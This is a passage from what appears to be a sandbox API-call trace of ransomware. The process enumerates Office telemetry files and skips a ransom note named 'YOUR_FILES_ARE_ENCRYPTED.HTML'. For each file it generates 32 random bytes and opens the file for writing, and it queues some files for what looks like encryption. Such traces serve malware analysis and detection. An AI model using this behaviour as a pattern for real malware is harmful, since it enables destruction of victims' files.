lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf1e947a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1e947a0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1e947a0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12c, dwReserved0=0x0, dwReserved1=0x60, cFileName="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (1) - 2028 - winword.exe - OTele.dat", cAlternateFileName="{1C990~4.DAT")) returned 1 [0159.619] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (1) - 2028 - winword.exe - OTele.dat") returned 136 [0159.620] lstrcmpW (lpString1="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (1) - 2028 - winword.exe - OTele.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.620] PathFindExtensionW (pszPath="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (1) - 2028 - winword.exe - OTele.dat") returned=".dat" [0159.620] lstrlenW 
(lpString=".dat") returned 4 [0159.620] PathFindExtensionW (pszPath="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (1) - 2028 - winword.exe - OTele.dat") returned=".dat" [0159.620] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.620] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (1) - 2028 - winword.exe - OTele.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{1c9909c9-fd1c-4e1b-870c-6b753d804628} (1) - 2028 - winword.exe - otele.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.621] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=300) returned 1 [0159.621] CloseHandle (hObject=0x58c) returned 1 [0159.622] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf1e947a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1e947a0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1e947a0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x1e1, dwReserved0=0x0, dwReserved1=0x60, cFileName="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (1) - 2028 - winword.exe - OTeleMediumCost.dat", cAlternateFileName="{1C990~3.DAT")) returned 1 [0159.622] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (1) - 2028 - winword.exe - OTeleMediumCost.dat") returned 146 [0159.622] lstrcmpW (lpString1="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (1) - 2028 - winword.exe - OTeleMediumCost.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 
-1 [0159.622] PathFindExtensionW (pszPath="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (1) - 2028 - winword.exe - OTeleMediumCost.dat") returned=".dat" [0159.622] lstrlenW (lpString=".dat") returned 4 [0159.622] PathFindExtensionW (pszPath="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (1) - 2028 - winword.exe - OTeleMediumCost.dat") returned=".dat" [0159.622] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.622] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (1) - 2028 - winword.exe - OTeleMediumCost.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{1c9909c9-fd1c-4e1b-870c-6b753d804628} (1) - 2028 - winword.exe - otelemediumcost.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.622] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=481) returned 1 [0159.622] CloseHandle (hObject=0x58c) returned 1 [0159.622] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe93ec620, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xe93ec620, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xe93ec620, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x11d, dwReserved0=0x0, dwReserved1=0x60, cFileName="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTele.dat", cAlternateFileName="{2D5D3~2.DAT")) returned 1 [0159.622] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTele.dat") 
returned 137 [0159.622] lstrcmpW (lpString1="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTele.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.622] PathFindExtensionW (pszPath="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTele.dat") returned=".dat" [0159.622] lstrlenW (lpString=".dat") returned 4 [0159.623] PathFindExtensionW (pszPath="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTele.dat") returned=".dat" [0159.623] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.623] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTele.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{2d5d3b0c-dc37-43db-8b18-d419e1b30f6f} (0) - 2480 - powerpnt.exe - otele.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.623] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=285) returned 1 [0159.623] CloseHandle (hObject=0x58c) returned 1 [0159.623] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe93ec620, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xe93ec620, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xe93ec620, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x351, dwReserved0=0x0, dwReserved1=0x60, cFileName="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTeleMediumCost.dat", cAlternateFileName="{2D5D3~1.DAT")) returned 1 [0159.623] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTeleMediumCost.dat") returned 147 [0159.623] lstrcmpW (lpString1="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTeleMediumCost.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.623] PathFindExtensionW (pszPath="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTeleMediumCost.dat") returned=".dat" [0159.623] lstrlenW (lpString=".dat") returned 4 [0159.623] PathFindExtensionW (pszPath="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTeleMediumCost.dat") returned=".dat" [0159.623] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.623] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTeleMediumCost.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{2d5d3b0c-dc37-43db-8b18-d419e1b30f6f} (0) - 2480 - powerpnt.exe - otelemediumcost.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.624] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=849) returned 1 [0159.624] GetProcessHeap () returned 0x270000 [0159.624] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0159.639] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="7A") returned 2 [0159.639] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="80") returned 2 [0159.639] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="E9") returned 2 [0159.639] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="DD") returned 2 [0159.639] wsprintfW (in: 
param_1=0x4ebd122, param_2="%02X" | out: param_1="77") returned 2 [0159.639] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="3A") returned 2 [0159.639] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="C9") returned 2 [0159.639] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="B1") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="CD") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="B9") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="8D") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="A6") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="17") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="A8") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="0E") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="62") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="EF") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="26") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="0B") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="74") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="3B") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="42") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="F2") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="44") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="09") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="A4") returned 2 
[0159.640] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="7E") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="83") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="24") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="46") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="2C") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="71") returned 2 [0159.641] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTeleMediumCost.dat" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTeleMediumCost.dat") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTeleMediumCost.dat" [0159.641] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.641] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0159.655] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe93ec620, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xe93ec620, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xe93ec620, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12c, dwReserved0=0x0, dwReserved1=0x60, cFileName="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (1) - 2480 - powerpnt.exe - OTele.dat", 
cAlternateFileName="{2D5D3~4.DAT")) returned 1 [0159.656] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (1) - 2480 - powerpnt.exe - OTele.dat") returned 137 [0159.656] lstrcmpW (lpString1="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (1) - 2480 - powerpnt.exe - OTele.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.656] PathFindExtensionW (pszPath="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (1) - 2480 - powerpnt.exe - OTele.dat") returned=".dat" [0159.656] lstrlenW (lpString=".dat") returned 4 [0159.656] PathFindExtensionW (pszPath="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (1) - 2480 - powerpnt.exe - OTele.dat") returned=".dat" [0159.656] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.656] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (1) - 2480 - powerpnt.exe - OTele.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{2d5d3b0c-dc37-43db-8b18-d419e1b30f6f} (1) - 2480 - powerpnt.exe - otele.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.658] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=300) returned 1 [0159.658] CloseHandle (hObject=0x58c) returned 1 [0159.658] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe93ec620, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xe93ec620, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xe93ec620, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, 
nFileSizeLow=0x1e1, dwReserved0=0x0, dwReserved1=0x60, cFileName="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (1) - 2480 - powerpnt.exe - OTeleMediumCost.dat", cAlternateFileName="{2D5D3~3.DAT")) returned 1 [0159.658] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (1) - 2480 - powerpnt.exe - OTeleMediumCost.dat") returned 147 [0159.658] lstrcmpW (lpString1="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (1) - 2480 - powerpnt.exe - OTeleMediumCost.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.658] PathFindExtensionW (pszPath="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (1) - 2480 - powerpnt.exe - OTeleMediumCost.dat") returned=".dat" [0159.658] lstrlenW (lpString=".dat") returned 4 [0159.658] PathFindExtensionW (pszPath="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (1) - 2480 - powerpnt.exe - OTeleMediumCost.dat") returned=".dat" [0159.658] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.658] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (1) - 2480 - powerpnt.exe - OTeleMediumCost.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{2d5d3b0c-dc37-43db-8b18-d419e1b30f6f} (1) - 2480 - powerpnt.exe - otelemediumcost.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.659] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=481) returned 1 [0159.659] CloseHandle (hObject=0x58c) returned 1 [0159.659] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdf8c0c00, 
ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xdf8c0c00, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xdf8c0c00, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x117, dwReserved0=0x0, dwReserved1=0x60, cFileName="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTele.dat", cAlternateFileName="{DF01D~2.DAT")) returned 1 [0159.659] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTele.dat") returned 134 [0159.659] lstrcmpW (lpString1="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTele.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.659] PathFindExtensionW (pszPath="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTele.dat") returned=".dat" [0159.659] lstrlenW (lpString=".dat") returned 4 [0159.659] PathFindExtensionW (pszPath="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTele.dat") returned=".dat" [0159.659] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.659] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTele.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{df01d142-853f-4ec3-8f09-c2194cb1a39c} (0) - 2104 - excel.exe - otele.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.660] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=279) returned 1 [0159.660] CloseHandle (hObject=0x58c) returned 1 [0159.660] FindNextFileW (in: hFindFile=0x42f3240, 
lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdf89aaa0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xdf89aaa0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xdf89aaa0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x345, dwReserved0=0x0, dwReserved1=0x60, cFileName="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTeleMediumCost.dat", cAlternateFileName="{DF01D~1.DAT")) returned 1 [0159.660] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTeleMediumCost.dat") returned 144 [0159.660] lstrcmpW (lpString1="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTeleMediumCost.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.660] PathFindExtensionW (pszPath="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTeleMediumCost.dat") returned=".dat" [0159.660] lstrlenW (lpString=".dat") returned 4 [0159.660] PathFindExtensionW (pszPath="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTeleMediumCost.dat") returned=".dat" [0159.660] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTeleMediumCost.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{df01d142-853f-4ec3-8f09-c2194cb1a39c} (0) - 2104 - excel.exe - otelemediumcost.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.661] GetFileSizeEx 
(in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=837) returned 1 [0159.661] GetProcessHeap () returned 0x270000 [0159.661] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0159.662] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="FE") returned 2 [0159.662] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="32") returned 2 [0159.662] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="3F") returned 2 [0159.662] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="BC") returned 2 [0159.662] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="C2") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="63") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="29") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="F7") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="66") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="0D") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="99") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="46") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="FE") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="E3") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="0D") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="C2") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="4C") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="9B") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="AD") returned 2 [0159.663] wsprintfW (in: 
param_1=0x4ebd15e, param_2="%02X" | out: param_1="08") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="AD") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="2C") returned 2 [0159.664] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="10") returned 2 [0159.664] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="03") returned 2 [0159.664] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="F9") returned 2 [0159.664] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="4F") returned 2 [0159.664] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="3A") returned 2 [0159.664] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="F4") returned 2 [0159.664] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="E0") returned 2 [0159.664] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="DD") returned 2 [0159.664] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="ED") returned 2 [0159.664] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="09") returned 2 [0159.665] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTeleMediumCost.dat" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTeleMediumCost.dat") 